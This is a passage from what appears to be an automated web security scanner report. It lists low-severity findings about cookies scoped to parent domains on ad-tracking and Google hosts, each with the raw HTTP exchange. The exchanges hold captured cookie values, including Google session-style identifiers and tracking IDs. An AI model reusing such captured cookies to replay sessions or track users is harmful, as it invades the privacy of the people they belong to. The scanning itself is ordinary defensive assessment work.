T1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kes:Q'TOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9?.JE/qX3; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?edtZBb#9$mX.@Q@73P$*uPoKMjCf24wZ'IZLA`.ZC15pJ!+)d.+rHP13k+phc8qcJFwIpC#*Ojk$I#Q9M:ZM-Jm4^*0]M_@X>FG=uNJ?lnOAI]f*J+>[/Bh/ce?bDXi/Su11dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!3=`^=eT1s; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly
Location: http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Date: Sun, 24 Apr 2011 12:31:35 GMT
Content-Length: 0


17.96. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676458&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658458620&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658458624&frm=1&adk=2614322350&ga_vid=648576074.1303658459&ga_sid=1303658459&ga_hid=197278331&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 15:20:57 GMT
Content-Length: 3578

<iframe src="http://view.atdmt.com/DEN/iview/289793864/direct/011303658455?click=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1A
...[SNIP]...

17.97. http://ib.adnxs.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?id=689&bidder=2&seg=21983&order_id=0&value=0.00 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ib.adnxs.com
Cookie: uuid2=1695130615685728298; icu=ChII15QBEAoYHiAeKB4woa_a6wQQoa_a6wQYHQ..; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEhzW[8K!kk3pm]7P<L>RecdTrcli2Z%p3eibgrRz.tN^U[>M:r%p4!@wOno=unnY4g)/JMCybh<W`L2Mw:q1kw'aDHP<1%-?peC`TZEnU8Ep.IkJ!nVOzxNyQ!0J?

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 01:31:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=1695130615685728298; path=/; expires=Sun, 24-Jul-2011 01:31:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=1695130615685728298; path=/; expires=Sun, 24-Jul-2011 01:31:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip4FO?l.(BDskdsZRPBYmHI)A:orP4XK; path=/; expires=Sun, 24-Jul-2011 01:31:28 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 01:31:28 GMT

GIF89a.............!.......,........@..L..;

17.98. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=93909&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^hWC]^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).LqgX<K=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@La(Km

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).LqgX<K=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@PfkY$; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:34 GMT

GIF89a.............!.......,........@..L..;

17.99. http://id.google.com/verify/EAAAALo1qFZ_GU7ze97DXbvzobQ.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALo1qFZ_GU7ze97DXbvzobQ.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALo1qFZ_GU7ze97DXbvzobQ.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=2xQ98BuK1OZAzoTpyTdEFqAVuEmCGcnBKe3PM4WuUA=SOZInWGTVqZT_S6u; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=j_53tKKb_jMT30cUAHHKys78sYm_jf68WQI2XqEliA=wHhg-5oV5bH28hOR; expires=Mon, 24-Oct-2011 19:45:04 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 24 Apr 2011 19:45:04 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

17.100. http://id.google.com/verify/EAAAANQhD1wDZOumO9f0pkRAxSM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAANQhD1wDZOumO9f0pkRAxSM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAANQhD1wDZOumO9f0pkRAxSM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=2xQ98BuK1OZAzoTpyTdEFqAVuEmCGcnBKe3PM4WuUA=SOZInWGTVqZT_S6u; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=j_53tKKb_jMT30cUAHHKys78sYm_jf68WQI2XqEliA=wHhg-5oV5bH28hOR; expires=Mon, 24-Oct-2011 19:45:04 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 24 Apr 2011 19:45:04 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

17.101. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4318baf9-76a8-4375-a570-ccc64464b1df HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250; domain=.interclick.com; expires=Sun, 25-Apr-2021 00:52:54 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 00:52:54 GMT

GIF89a.............!.......,...........D..;

17.102. http://image.providesupport.com/js/spiffyman/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/spiffyman/safe-standard.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/spiffyman/safe-standard.js?ps_h=EPGr&ps_t=1303674267005 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=L26F36YDGtP8;Path=/;Domain=.providesupport.com
Content-Length: 5028
Date: Sun, 24 Apr 2011 19:46:50 GMT
Connection: close

var psEPGrsid = "L26F36YDGtP8";
// safe-standard@gecko.js

var psEPGriso;
try {
   psEPGriso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psEPGrwid != null);
} catch(e) {
   psEPGr
...[SNIP]...

17.103. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTEwMzkmdGw9NDMyMDA=&piggybackCookie=xrd52zkwjuxh HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:12 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_133=1873-xrd52zkwjuxh; domain=pubmatic.com; expires=Tue, 24-May-2011 16:35:12 GMT; path=/
